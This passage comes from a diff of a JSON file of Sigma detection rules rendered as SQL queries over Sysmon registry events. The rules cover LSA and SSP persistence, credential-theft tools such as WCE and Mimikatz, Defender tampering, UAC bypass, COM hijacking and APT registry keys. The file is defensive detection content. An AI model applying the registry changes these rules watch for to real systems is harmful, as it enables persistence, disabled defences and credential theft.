AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' 
ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": 
"registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": 
"f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + 
"attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' 
ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "status": "test", + "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "author": "iwillkeepwatch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1547.005" ], "falsepositives": [ - "Administrator actions" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD 
(0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" ], - "filename": "registry_set_windows_defender_tamper.yml" + "filename": "registry_event_ssp_added_lsa_config.yml" }, { - "title": "PowerShell as a Service in Registry", - "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "title": "PrinterNightmare Mimimkatz Driver Name", + "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "status": "test", - "description": "Detects that a powershell code is written to the registry as a service.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "author": "Markus Neis, @markus_neis, Florian Roth", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unknown" + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' 
OR Details LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_event_mimikatz_printernightmare.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "CMSTP Execution Registry Event", + "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unlikely" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_event_cmstp_execution_by_registry.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "title": "OilRig APT Registry Persistence", + "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", "status": "test", - "description": "Bypasses User Account Control using a fileless method", - "author": "frack113", + "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_event_apt_oilrig_mar18.yml" }, { 
- "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_runkey_winekey.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1136.001" ], "falsepositives": [ - "Probable legitimate 
applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a 
user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ "attack.persistence", - "attack.t1547.010" - ], - "falsepositives": [ - "Unknown" + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 